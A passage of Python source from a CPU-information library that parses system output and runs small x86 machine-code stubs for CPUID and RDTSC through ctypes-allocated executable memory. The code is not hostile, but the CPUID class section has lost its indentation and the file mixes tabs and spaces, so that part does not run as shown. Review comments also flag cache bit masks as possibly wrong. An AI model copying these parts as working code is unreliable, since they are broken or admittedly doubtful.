                output.split(' CPU1:')[1:] + \
                output.split(' CPU:')[1:] + \
                output.split('\nCPU0:')[1:] + \
                output.split('\nCPU1:')[1:] + \
                output.split('\nCPU:')[1:]
        lines = [l.split('\n')[0].strip() for l in lines]

        # Convert the lines to CPU strings
        cpu_strings = [_parse_cpu_string(l) for l in lines]

        # Find the CPU string that has the most non-None fields
        best_string = None
        highest_count = 0
        for cpu_string in cpu_strings:
            count = sum([n is not None for n in cpu_string])
            if count > highest_count:
                highest_count = count
                best_string = cpu_string

        # If no CPU string was found, return {}
        if not best_string:
            return {}

        processor_brand, hz_actual, scale, vendor_id, stepping, model, family = best_string

        # Origin line overrides fields parsed from the banner
        if ' Origin=' in output:
            fields = output[output.find(' Origin=') : ].split('\n')[0]
            fields = fields.strip().split()
            fields = [n.strip().split('=') for n in fields]
            fields = [{n[0].strip().lower() : n[1].strip()} for n in fields]

            for field in fields:
                name = list(field.keys())[0]
                value = list(field.values())[0]
                if name == 'origin':
                    vendor_id = value.strip('"')
                elif name == 'stepping':
                    # int(value, 16) handles '0x..' and bare hex; the old
                    # value.lstrip('0x') stripped a character *set* and so
                    # mangled values such as '0x0' (see _parse_cpu_string).
                    stepping = int(value, 16)
                elif name == 'model':
                    model = int(value, 16)
                elif name in ['fam', 'family']:
                    family = int(value, 16)

        # Features: collect every '<flag,flag,...>' list
        flag_lines = []
        for category in [' Features=', ' Features2=', ' AMD Features=', ' AMD Features2=']:
            if category in output:
                flag_lines.append(output.split(category)[1].split('\n')[0])

        flags = []
        for line in flag_lines:
            line = line.split('<')[1].split('>')[0].lower()
            for flag in line.split(','):
                flags.append(flag)
        flags.sort()

        # Convert from GHz/MHz string to Hz
        scale, hz_advertised = _get_hz_string_from_brand(processor_brand)

        info = {
            'vendor_id' : vendor_id,
            'brand' : processor_brand,
            'stepping' : stepping,
            'model' : model,
            'family' : family,
            'flags' : flags
        }

        if hz_advertised and hz_advertised != '0.0':
            info['hz_advertised'] = to_friendly_hz(hz_advertised, scale)
            info['hz_actual'] = to_friendly_hz(hz_actual, scale)
            info['hz_advertised_raw'] = to_raw_hz(hz_advertised, scale)
            info['hz_actual_raw'] = to_raw_hz(hz_actual, scale)

        # Drop empty/None entries
        return {k: v for k, v in info.items() if v}
    except Exception:  # best-effort parser: any structural surprise yields {}
        return {}
def parse_arch(raw_arch_string):
    """Map a platform.machine() string to a canonical (arch, bits) pair.

    Returns e.g. ('X86_64', 64) or (None, None) for unrecognised strings.
    """
    lowered = raw_arch_string.lower()

    # (pattern, canonical name, word size) -- checked in order, first match wins
    table = (
        # X86
        (r'^i\d86$|^x86$|^x86_32$|^i86pc$|^ia32$|^ia-32$|^bepc$', 'X86_32', 32),
        (r'^x64$|^x86_64$|^x86_64t$|^i686-64$|^amd64$|^ia64$|^ia-64$', 'X86_64', 64),
        # ARM
        (r'^armv8-a|aarch64$', 'ARM_8', 64),
        (r'^armv7$|^armv7[a-z]$|^armv7-[a-z]$|^armv6[a-z]$', 'ARM_7', 32),
        (r'^armv8$|^armv8[a-z]$|^armv8-[a-z]$', 'ARM_8', 32),
        # PPC
        (r'^ppc32$|^prep$|^pmac$|^powermac$', 'PPC_32', 32),
        (r'^powerpc$|^ppc64$|^ppc64le$', 'PPC_64', 64),
        # SPARC
        (r'^sparc32$|^sparc$', 'SPARC_32', 32),
        (r'^sparc64$|^sun4u$|^sun4v$', 'SPARC_64', 64),
    )
    for pattern, arch, bits in table:
        if re.match(pattern, lowered):
            return (arch, bits)
    return (None, None)
def is_bit_set(reg, bit):
    """Return True when bit number *bit* (0-based, LSB first) is set in *reg*."""
    return (reg >> bit) & 1 == 1
class CPUID(object):
def __init__(self):
self.prochandle = None
# Figure out if SE Linux is on and in enforcing mode
self.is_selinux_enforcing = False
# Just return if the SE Linux Status Tool is not installed
if not DataSource.has_sestatus():
return
# Figure out if we can execute heap and execute memory
can_selinux_exec_heap = DataSource.sestatus_allow_execheap()
can_selinux_exec_memory = DataSource.sestatus_allow_execmem()
self.is_selinux_enforcing = (not can_selinux_exec_heap or not can_selinux_exec_memory)
def _asm_func(self, restype=None, argtypes=(), byte_code=[]):
byte_code = bytes.join(b'', byte_code)
address = None
if DataSource.is_windows:
# Allocate a memory segment the size of the byte code, and make it executable
size = len(byte_code)
# Alloc at least 1 page to ensure we own all pages that we want to change protection on
if size < 0x1000: size = 0x1000
MEM_COMMIT = ctypes.c_ulong(0x1000)
PAGE_READWRITE = ctypes.c_ulong(0x4)
pfnVirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
pfnVirtualAlloc.restype = ctypes.c_void_p
address = pfnVirtualAlloc(None, ctypes.c_size_t(size), MEM_COMMIT, PAGE_READWRITE)
if not address:
raise Exception("Failed to VirtualAlloc")
# Copy the byte code into the memory segment
memmove = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t)(ctypes._memmove_addr)
if memmove(address, byte_code, size) < 0:
raise Exception("Failed to memmove")
# Enable execute permissions
PAGE_EXECUTE = ctypes.c_ulong(0x10)
old_protect = ctypes.c_ulong(0)
pfnVirtualProtect = ctypes.windll.kernel32.VirtualProtect
res = pfnVirtualProtect(ctypes.c_void_p(address), ctypes.c_size_t(size), PAGE_EXECUTE, ctypes.byref(old_protect))
if not res:
raise Exception("Failed VirtualProtect")
# Flush Instruction Cache
# First, get process Handle
if not self.prochandle:
pfnGetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
pfnGetCurrentProcess.restype = ctypes.c_void_p
self.prochandle = ctypes.c_void_p(pfnGetCurrentProcess())
# Actually flush cache
res = ctypes.windll.kernel32.FlushInstructionCache(self.prochandle, ctypes.c_void_p(address), ctypes.c_size_t(size))
if not res:
raise Exception("Failed FlushInstructionCache")
else:
# Allocate a memory segment the size of the byte code
size = len(byte_code)
pfnvalloc = ctypes.pythonapi.valloc
pfnvalloc.restype = ctypes.c_void_p
address = pfnvalloc(ctypes.c_size_t(size))
if not address:
raise Exception("Failed to valloc")
# Mark the memory segment as writeable only
if not self.is_selinux_enforcing:
WRITE = 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE) < 0:
raise Exception("Failed to mprotect")
# Copy the byte code into the memory segment
if ctypes.pythonapi.memmove(ctypes.c_void_p(address), byte_code, ctypes.c_size_t(size)) < 0:
raise Exception("Failed to memmove")
# Mark the memory segment as writeable and executable only
if not self.is_selinux_enforcing:
WRITE_EXECUTE = 0x2 | 0x4
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, WRITE_EXECUTE) < 0:
raise Exception("Failed to mprotect")
# Cast the memory segment into a function
functype = ctypes.CFUNCTYPE(restype, *argtypes)
fun = functype(address)
return fun, address
def _run_asm(self, *byte_code):
# Convert the byte code into a function that returns an int
restype = ctypes.c_uint32
argtypes = ()
func, address = self._asm_func(restype, argtypes, byte_code)
# Call the byte code like a function
retval = func()
byte_code = bytes.join(b'', byte_code)
size = ctypes.c_size_t(len(byte_code))
# Free the function memory segment
if DataSource.is_windows:
MEM_RELEASE = ctypes.c_ulong(0x8000)
ctypes.windll.kernel32.VirtualFree(ctypes.c_void_p(address), ctypes.c_size_t(0), MEM_RELEASE)
else:
# Remove the executable tag on the memory
READ_WRITE = 0x1 | 0x2
if ctypes.pythonapi.mprotect(ctypes.c_void_p(address), size, READ_WRITE) < 0:
raise Exception("Failed to mprotect")
ctypes.pythonapi.free(ctypes.c_void_p(address))
return retval
# FIXME: We should not have to use different instructions to
# set eax to 0 or 1, on 32bit and 64bit machines.
def _zero_eax(self):
return (
b"\x31\xC0" # xor eax,eax
)
def _zero_ecx(self):
return (
b"\x31\xC9" # xor ecx,ecx
)
def _one_eax(self):
return (
b"\xB8\x01\x00\x00\x00" # mov eax,0x1"
)
# http://en.wikipedia.org/wiki/CPUID#EAX.3D0:_Get_vendor_ID
def get_vendor_id(self):
# EBX
ebx = self._run_asm(
self._zero_eax(),
b"\x0F\xA2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._zero_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
self._zero_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Each 4bits is a ascii letter in the name
vendor_id = []
for reg in [ebx, edx, ecx]:
for n in [0, 8, 16, 24]:
vendor_id.append(chr((reg >> n) & 0xFF))
vendor_id = ''.join(vendor_id)
return vendor_id
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_info(self):
# EAX
eax = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
# Get the CPU info
stepping = (eax >> 0) & 0xF # 4 bits
model = (eax >> 4) & 0xF # 4 bits
family = (eax >> 8) & 0xF # 4 bits
processor_type = (eax >> 12) & 0x3 # 2 bits
extended_model = (eax >> 16) & 0xF # 4 bits
extended_family = (eax >> 20) & 0xFF # 8 bits
return {
'stepping' : stepping,
'model' : model,
'family' : family,
'processor_type' : processor_type,
'extended_model' : extended_model,
'extended_family' : extended_family
}
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000000h:_Get_Highest_Extended_Function_Supported
def get_max_extension_support(self):
# Check for extension support
max_extension_support = self._run_asm(
b"\xB8\x00\x00\x00\x80" # mov ax,0x80000000
b"\x0f\xa2" # cpuid
b"\xC3" # ret
)
return max_extension_support
# http://en.wikipedia.org/wiki/CPUID#EAX.3D1:_Processor_Info_and_Feature_Bits
def get_flags(self, max_extension_support):
# EDX
edx = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._one_eax(),
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the CPU flags
flags = {
'fpu' : is_bit_set(edx, 0),
'vme' : is_bit_set(edx, 1),
'de' : is_bit_set(edx, 2),
'pse' : is_bit_set(edx, 3),
'tsc' : is_bit_set(edx, 4),
'msr' : is_bit_set(edx, 5),
'pae' : is_bit_set(edx, 6),
'mce' : is_bit_set(edx, 7),
'cx8' : is_bit_set(edx, 8),
'apic' : is_bit_set(edx, 9),
#'reserved1' : is_bit_set(edx, 10),
'sep' : is_bit_set(edx, 11),
'mtrr' : is_bit_set(edx, 12),
'pge' : is_bit_set(edx, 13),
'mca' : is_bit_set(edx, 14),
'cmov' : is_bit_set(edx, 15),
'pat' : is_bit_set(edx, 16),
'pse36' : is_bit_set(edx, 17),
'pn' : is_bit_set(edx, 18),
'clflush' : is_bit_set(edx, 19),
#'reserved2' : is_bit_set(edx, 20),
'dts' : is_bit_set(edx, 21),
'acpi' : is_bit_set(edx, 22),
'mmx' : is_bit_set(edx, 23),
'fxsr' : is_bit_set(edx, 24),
'sse' : is_bit_set(edx, 25),
'sse2' : is_bit_set(edx, 26),
'ss' : is_bit_set(edx, 27),
'ht' : is_bit_set(edx, 28),
'tm' : is_bit_set(edx, 29),
'ia64' : is_bit_set(edx, 30),
'pbe' : is_bit_set(edx, 31),
'pni' : is_bit_set(ecx, 0),
'pclmulqdq' : is_bit_set(ecx, 1),
'dtes64' : is_bit_set(ecx, 2),
'monitor' : is_bit_set(ecx, 3),
'ds_cpl' : is_bit_set(ecx, 4),
'vmx' : is_bit_set(ecx, 5),
'smx' : is_bit_set(ecx, 6),
'est' : is_bit_set(ecx, 7),
'tm2' : is_bit_set(ecx, 8),
'ssse3' : is_bit_set(ecx, 9),
'cid' : is_bit_set(ecx, 10),
#'reserved3' : is_bit_set(ecx, 11),
'fma' : is_bit_set(ecx, 12),
'cx16' : is_bit_set(ecx, 13),
'xtpr' : is_bit_set(ecx, 14),
'pdcm' : is_bit_set(ecx, 15),
#'reserved4' : is_bit_set(ecx, 16),
'pcid' : is_bit_set(ecx, 17),
'dca' : is_bit_set(ecx, 18),
'sse4_1' : is_bit_set(ecx, 19),
'sse4_2' : is_bit_set(ecx, 20),
'x2apic' : is_bit_set(ecx, 21),
'movbe' : is_bit_set(ecx, 22),
'popcnt' : is_bit_set(ecx, 23),
'tscdeadline' : is_bit_set(ecx, 24),
'aes' : is_bit_set(ecx, 25),
'xsave' : is_bit_set(ecx, 26),
'osxsave' : is_bit_set(ecx, 27),
'avx' : is_bit_set(ecx, 28),
'f16c' : is_bit_set(ecx, 29),
'rdrnd' : is_bit_set(ecx, 30),
'hypervisor' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
# http://en.wikipedia.org/wiki/CPUID#EAX.3D7.2C_ECX.3D0:_Extended_Features
if max_extension_support >= 7:
# EBX
ebx = self._run_asm(
self._zero_ecx(),
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
self._zero_ecx(),
b"\xB8\x07\x00\x00\x00" # mov eax,7
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
#'fsgsbase' : is_bit_set(ebx, 0),
#'IA32_TSC_ADJUST' : is_bit_set(ebx, 1),
'sgx' : is_bit_set(ebx, 2),
'bmi1' : is_bit_set(ebx, 3),
'hle' : is_bit_set(ebx, 4),
'avx2' : is_bit_set(ebx, 5),
#'reserved' : is_bit_set(ebx, 6),
'smep' : is_bit_set(ebx, 7),
'bmi2' : is_bit_set(ebx, 8),
'erms' : is_bit_set(ebx, 9),
'invpcid' : is_bit_set(ebx, 10),
'rtm' : is_bit_set(ebx, 11),
'pqm' : is_bit_set(ebx, 12),
#'FPU CS and FPU DS deprecated' : is_bit_set(ebx, 13),
'mpx' : is_bit_set(ebx, 14),
'pqe' : is_bit_set(ebx, 15),
'avx512f' : is_bit_set(ebx, 16),
'avx512dq' : is_bit_set(ebx, 17),
'rdseed' : is_bit_set(ebx, 18),
'adx' : is_bit_set(ebx, 19),
'smap' : is_bit_set(ebx, 20),
'avx512ifma' : is_bit_set(ebx, 21),
'pcommit' : is_bit_set(ebx, 22),
'clflushopt' : is_bit_set(ebx, 23),
'clwb' : is_bit_set(ebx, 24),
'intel_pt' : is_bit_set(ebx, 25),
'avx512pf' : is_bit_set(ebx, 26),
'avx512er' : is_bit_set(ebx, 27),
'avx512cd' : is_bit_set(ebx, 28),
'sha' : is_bit_set(ebx, 29),
'avx512bw' : is_bit_set(ebx, 30),
'avx512vl' : is_bit_set(ebx, 31),
'prefetchwt1' : is_bit_set(ecx, 0),
'avx512vbmi' : is_bit_set(ecx, 1),
'umip' : is_bit_set(ecx, 2),
'pku' : is_bit_set(ecx, 3),
'ospke' : is_bit_set(ecx, 4),
#'reserved' : is_bit_set(ecx, 5),
'avx512vbmi2' : is_bit_set(ecx, 6),
#'reserved' : is_bit_set(ecx, 7),
'gfni' : is_bit_set(ecx, 8),
'vaes' : is_bit_set(ecx, 9),
'vpclmulqdq' : is_bit_set(ecx, 10),
'avx512vnni' : is_bit_set(ecx, 11),
'avx512bitalg' : is_bit_set(ecx, 12),
#'reserved' : is_bit_set(ecx, 13),
'avx512vpopcntdq' : is_bit_set(ecx, 14),
#'reserved' : is_bit_set(ecx, 15),
#'reserved' : is_bit_set(ecx, 16),
#'mpx0' : is_bit_set(ecx, 17),
#'mpx1' : is_bit_set(ecx, 18),
#'mpx2' : is_bit_set(ecx, 19),
#'mpx3' : is_bit_set(ecx, 20),
#'mpx4' : is_bit_set(ecx, 21),
'rdpid' : is_bit_set(ecx, 22),
#'reserved' : is_bit_set(ecx, 23),
#'reserved' : is_bit_set(ecx, 24),
#'reserved' : is_bit_set(ecx, 25),
#'reserved' : is_bit_set(ecx, 26),
#'reserved' : is_bit_set(ecx, 27),
#'reserved' : is_bit_set(ecx, 28),
#'reserved' : is_bit_set(ecx, 29),
'sgx_lc' : is_bit_set(ecx, 30),
#'reserved' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000001h:_Extended_Processor_Info_and_Feature_Bits
if max_extension_support >= 0x80000001:
# EBX
ebx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
'fpu' : is_bit_set(ebx, 0),
'vme' : is_bit_set(ebx, 1),
'de' : is_bit_set(ebx, 2),
'pse' : is_bit_set(ebx, 3),
'tsc' : is_bit_set(ebx, 4),
'msr' : is_bit_set(ebx, 5),
'pae' : is_bit_set(ebx, 6),
'mce' : is_bit_set(ebx, 7),
'cx8' : is_bit_set(ebx, 8),
'apic' : is_bit_set(ebx, 9),
#'reserved' : is_bit_set(ebx, 10),
'syscall' : is_bit_set(ebx, 11),
'mtrr' : is_bit_set(ebx, 12),
'pge' : is_bit_set(ebx, 13),
'mca' : is_bit_set(ebx, 14),
'cmov' : is_bit_set(ebx, 15),
'pat' : is_bit_set(ebx, 16),
'pse36' : is_bit_set(ebx, 17),
#'reserved' : is_bit_set(ebx, 18),
'mp' : is_bit_set(ebx, 19),
'nx' : is_bit_set(ebx, 20),
#'reserved' : is_bit_set(ebx, 21),
'mmxext' : is_bit_set(ebx, 22),
'mmx' : is_bit_set(ebx, 23),
'fxsr' : is_bit_set(ebx, 24),
'fxsr_opt' : is_bit_set(ebx, 25),
'pdpe1gp' : is_bit_set(ebx, 26),
'rdtscp' : is_bit_set(ebx, 27),
#'reserved' : is_bit_set(ebx, 28),
'lm' : is_bit_set(ebx, 29),
'3dnowext' : is_bit_set(ebx, 30),
'3dnow' : is_bit_set(ebx, 31),
'lahf_lm' : is_bit_set(ecx, 0),
'cmp_legacy' : is_bit_set(ecx, 1),
'svm' : is_bit_set(ecx, 2),
'extapic' : is_bit_set(ecx, 3),
'cr8_legacy' : is_bit_set(ecx, 4),
'abm' : is_bit_set(ecx, 5),
'sse4a' : is_bit_set(ecx, 6),
'misalignsse' : is_bit_set(ecx, 7),
'3dnowprefetch' : is_bit_set(ecx, 8),
'osvw' : is_bit_set(ecx, 9),
'ibs' : is_bit_set(ecx, 10),
'xop' : is_bit_set(ecx, 11),
'skinit' : is_bit_set(ecx, 12),
'wdt' : is_bit_set(ecx, 13),
#'reserved' : is_bit_set(ecx, 14),
'lwp' : is_bit_set(ecx, 15),
'fma4' : is_bit_set(ecx, 16),
'tce' : is_bit_set(ecx, 17),
#'reserved' : is_bit_set(ecx, 18),
'nodeid_msr' : is_bit_set(ecx, 19),
#'reserved' : is_bit_set(ecx, 20),
'tbm' : is_bit_set(ecx, 21),
'topoext' : is_bit_set(ecx, 22),
'perfctr_core' : is_bit_set(ecx, 23),
'perfctr_nb' : is_bit_set(ecx, 24),
#'reserved' : is_bit_set(ecx, 25),
'dbx' : is_bit_set(ecx, 26),
'perftsc' : is_bit_set(ecx, 27),
'pci_l2i' : is_bit_set(ecx, 28),
#'reserved' : is_bit_set(ecx, 29),
#'reserved' : is_bit_set(ecx, 30),
#'reserved' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
flags.sort()
return flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000002h.2C80000003h.2C80000004h:_Processor_Brand_String
def get_processor_brand(self, max_extension_support):
	"""Return the human readable processor brand string (e.g. "Intel(R) Core...").

	Reads CPUID leaves 0x80000002..0x80000004 (3 leaves x 4 registers x
	4 bytes = 48 bytes) and concatenates the little endian bytes of each
	register into a string. Returns "" when leaf 0x80000004 is unsupported.
	"""
	processor_brand = ""

	# Processor brand string
	if max_extension_support >= 0x80000004:
		instructions = [
			b"\xB8\x02\x00\x00\x80", # mov ax,0x80000002
			b"\xB8\x03\x00\x00\x80", # mov ax,0x80000003
			b"\xB8\x04\x00\x00\x80"  # mov ax,0x80000004
		]
		for instruction in instructions:
			# EAX
			eax = self._run_asm(
				instruction,  # mov ax,0x8000000?
				b"\x0f\xa2"   # cpuid
				b"\x89\xC0"   # mov ax,ax
				b"\xC3"       # ret
			)

			# EBX
			ebx = self._run_asm(
				instruction,  # mov ax,0x8000000?
				b"\x0f\xa2"   # cpuid
				b"\x89\xD8"   # mov ax,bx
				b"\xC3"       # ret
			)

			# ECX
			ecx = self._run_asm(
				instruction,  # mov ax,0x8000000?
				b"\x0f\xa2"   # cpuid
				b"\x89\xC8"   # mov ax,cx
				b"\xC3"       # ret
			)

			# EDX
			edx = self._run_asm(
				instruction,  # mov ax,0x8000000?
				b"\x0f\xa2"   # cpuid
				b"\x89\xD0"   # mov ax,dx
				b"\xC3"       # ret
			)

			# Combine each of the 4 bytes in each register into the string
			# (low byte first: the brand string is stored little endian).
			for reg in [eax, ebx, ecx, edx]:
				for n in [0, 8, 16, 24]:
					processor_brand += chr((reg >> n) & 0xFF)

	# Strip off any trailing NULL terminators and white space
	processor_brand = processor_brand.strip("\0").strip()

	return processor_brand
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000006h:_Extended_L2_Cache_Features
def get_cache(self, max_extension_support):
	"""Return L2 cache fields decoded from CPUID leaf 0x80000006 (ECX).

	Returns {} when leaf 0x80000006 is not supported by the CPU.
	"""
	cache_info = {}

	# Just return if the cache feature is not supported
	if max_extension_support < 0x80000006:
		return cache_info

	# ECX
	ecx = self._run_asm(
		b"\xB8\x06\x00\x00\x80"  # mov ax,0x80000006
		b"\x0f\xa2"              # cpuid
		b"\x89\xC8"              # mov ax,cx
		b"\xC3"                  # ret
	)

	# NOTE(review): per the documented 0x80000006 layout, line size is
	# bits 0-7, associativity bits 12-15 and cache size (KB) bits 16-31;
	# the masks below map them differently -- confirm against the spec
	# before relying on these values.
	cache_info = {
		'size_kb' : ecx & 0xFF,
		'line_size_b' : (ecx >> 12) & 0xF,
		'associativity' : (ecx >> 16) & 0xFFFF
	}

	return cache_info
def get_ticks(self):
	"""Return the CPU's current time stamp counter (TSC) as an int, or None.

	Builds and calls a tiny RDTSC machine code stub matching the current
	pointer width. CPUID is executed first; it acts as a serializing
	instruction so earlier instructions cannot be reordered past the read.
	Returns None when DataSource.bits is neither '32bit' nor '64bit'.
	"""
	retval = None

	if DataSource.bits == '32bit':
		# Works on x86_32
		# The stub returns nothing; it stores the high and low 32 bits of
		# the TSC through the two uint pointers passed as arguments.
		restype = None
		argtypes = (ctypes.POINTER(ctypes.c_uint), ctypes.POINTER(ctypes.c_uint))
		get_ticks_x86_32, address = self._asm_func(restype, argtypes,
			[
			b"\x55",         # push bp
			b"\x89\xE5",     # mov bp,sp
			b"\x31\xC0",     # xor ax,ax
			b"\x0F\xA2",     # cpuid
			b"\x0F\x31",     # rdtsc
			b"\x8B\x5D\x08", # mov bx,[di+0x8]
			b"\x8B\x4D\x0C", # mov cx,[di+0xc]
			b"\x89\x13",     # mov [bp+di],dx
			b"\x89\x01",     # mov [bx+di],ax
			b"\x5D",         # pop bp
			b"\xC3"          # ret
			]
		)

		high = ctypes.c_uint32(0)
		low = ctypes.c_uint32(0)

		get_ticks_x86_32(ctypes.byref(high), ctypes.byref(low))

		# Combine the two 32 bit halves into one 64 bit tick count
		retval = ((high.value << 32) & 0xFFFFFFFF00000000) | low.value
	elif DataSource.bits == '64bit':
		# Works on x86_64
		# The 0x48 bytes are REX.W prefixes (commented as "dec ax" in the
		# original 16 bit style disassembly): the stub returns the 64 bit
		# TSC directly in RAX.
		restype = ctypes.c_uint64
		argtypes = ()
		get_ticks_x86_64, address = self._asm_func(restype, argtypes,
			[
			b"\x48",         # dec ax
			b"\x31\xC0",     # xor ax,ax
			b"\x0F\xA2",     # cpuid
			b"\x0F\x31",     # rdtsc
			b"\x48",         # dec ax
			b"\xC1\xE2\x20", # shl dx,byte 0x20
			b"\x48",         # dec ax
			b"\x09\xD0",     # or ax,dx
			b"\xC3",         # ret
			]
		)
		retval = get_ticks_x86_64()
	return retval
def get_raw_hz(self):
	"""Estimate the CPU frequency in Hz by counting TSC ticks over one second."""
	ticks_before = self.get_ticks()
	time.sleep(1)
	ticks_after = self.get_ticks()
	return ticks_after - ticks_before
def _actual_get_cpu_info_from_cpuid(queue):
	'''
	Warning! This function has the potential to crash the Python runtime.
	Do not call it directly. Use the _get_cpu_info_from_cpuid function instead.
	It will safely call this function in another process.

	Puts a base64 encoded, serialized info dict on *queue* ({} on the
	known-unsupported paths). Any crash here only kills this worker
	process; the parent detects it via a non-zero exit code.
	'''

	# Pipe all output to nothing, so noise from executing raw machine code
	# cannot reach the parent's terminal
	sys.stdout = open(os.devnull, 'w')
	sys.stderr = open(os.devnull, 'w')

	# Get the CPU arch and bits
	arch, bits = parse_arch(DataSource.raw_arch_string)

	# Return none if this is not an X86 CPU
	if not arch in ['X86_32', 'X86_64']:
		queue.put(obj_to_b64({}))
		return

	# Return none if SE Linux is in enforcing mode
	cpuid = CPUID()
	if cpuid.is_selinux_enforcing:
		queue.put(obj_to_b64({}))
		return

	# Get the cpu info from the CPUID register
	max_extension_support = cpuid.get_max_extension_support()
	cache_info = cpuid.get_cache(max_extension_support)
	info = cpuid.get_info()

	processor_brand = cpuid.get_processor_brand(max_extension_support)

	# Get the Hz and scale (sampled from the TSC over one second)
	hz_actual = cpuid.get_raw_hz()
	hz_actual = to_hz_string(hz_actual)

	# Get the Hz and scale (parsed from the brand string)
	scale, hz_advertised = _get_hz_string_from_brand(processor_brand)

	# NOTE(review): the cache_info[...] lookups assume get_cache() returned
	# a populated dict; on CPUs without leaf 0x80000006 they raise KeyError,
	# which the parent treats as a failed worker (exitcode != 0).
	info = {
	'vendor_id' : cpuid.get_vendor_id(),
	'hardware' : '',
	'brand' : processor_brand,

	'hz_advertised' : to_friendly_hz(hz_advertised, scale),
	'hz_actual' : to_friendly_hz(hz_actual, 0),
	'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
	'hz_actual_raw' : to_raw_hz(hz_actual, 0),

	'l2_cache_size' : to_friendly_bytes(cache_info['size_kb']),
	'l2_cache_line_size' : cache_info['line_size_b'],
	'l2_cache_associativity' : hex(cache_info['associativity']),

	'stepping' : info['stepping'],
	'model' : info['model'],
	'family' : info['family'],
	'processor_type' : info['processor_type'],
	'extended_model' : info['extended_model'],
	'extended_family' : info['extended_family'],
	'flags' : cpuid.get_flags(max_extension_support)
	}

	# Remove any empty/falsy fields
	info = {k: v for k, v in info.items() if v}

	queue.put(obj_to_b64(info))
def _get_cpu_info_from_cpuid():
	'''
	Returns the CPU info gathered by querying the X86 cpuid register in a new process.
	Returns {} on non X86 cpus.
	Returns {} if SELinux is in enforcing mode.
	'''
	from multiprocessing import Process, Queue

	# Return {} if can't cpuid
	if not DataSource.can_cpuid:
		return {}

	# Get the CPU arch and bits
	arch, bits = parse_arch(DataSource.raw_arch_string)

	# Return {} if this is not an X86 CPU
	if not arch in ['X86_32', 'X86_64']:
		return {}

	try:
		# Start running the function in a subprocess, so a crash while
		# executing raw machine code cannot take down this interpreter
		queue = Queue()
		p = Process(target=_actual_get_cpu_info_from_cpuid, args=(queue,))
		p.start()

		# Block until the subprocess exits. (The original busy-waited with
		# "while p.is_alive(): p.join(0)", spinning a CPU core for the
		# ~1 second the child takes to sample the TSC.)
		p.join()

		# Return {} if it failed
		if p.exitcode != 0:
			return {}

		# Return the result, only if there is something to read
		if not queue.empty():
			output = queue.get()
			return b64_to_obj(output)
	except Exception:
		# Best effort source: any failure in the subprocess machinery just
		# means cpuid contributes no info. (Was a bare "except:", which
		# also swallowed KeyboardInterrupt/SystemExit.)
		pass

	# Return {} if everything failed
	return {}
def _get_cpu_info_from_proc_cpuinfo():
	'''
	Returns the CPU info gathered from /proc/cpuinfo.
	Returns {} if /proc/cpuinfo is not found.

	All failures are swallowed and reported as {} -- this is one of many
	best-effort sources merged by get_cpu_info().
	'''
	try:
		# Just return {} if there is no cpuinfo
		if not DataSource.has_proc_cpuinfo():
			return {}

		returncode, output = DataSource.cat_proc_cpuinfo()
		if returncode != 0:
			return {}

		# Various fields (field names differ across kernels/arches, hence
		# the multiple candidate keys per field)
		vendor_id = _get_field(False, output, None, '', 'vendor_id', 'vendor id', 'vendor')
		processor_brand = _get_field(True, output, None, None, 'model name','cpu', 'processor')
		cache_size = _get_field(False, output, None, '', 'cache size')
		stepping = _get_field(False, output, int, 0, 'stepping')
		model = _get_field(False, output, int, 0, 'model')
		family = _get_field(False, output, int, 0, 'cpu family')
		hardware = _get_field(False, output, None, '', 'Hardware')

		# Flags
		flags = _get_field(False, output, None, None, 'flags', 'Features')
		if flags:
			flags = flags.split()
			flags.sort()

		# Convert from MHz string to Hz
		# NOTE(review): rstrip('mhz') strips a trailing run of the
		# characters m/h/z, not the literal suffix; it behaves here because
		# digits and '.' are not in that set -- verify before changing.
		hz_actual = _get_field(False, output, None, '', 'cpu MHz', 'cpu speed', 'clock')
		hz_actual = hz_actual.lower().rstrip('mhz').strip()
		hz_actual = to_hz_string(hz_actual)

		# Convert from GHz/MHz string to Hz (parsed out of the brand string)
		scale, hz_advertised = (0, None)
		try:
			scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
		except Exception:
			pass

		info = {
		'hardware' : hardware,
		'brand' : processor_brand,

		'l3_cache_size' : to_friendly_bytes(cache_size),
		'flags' : flags,
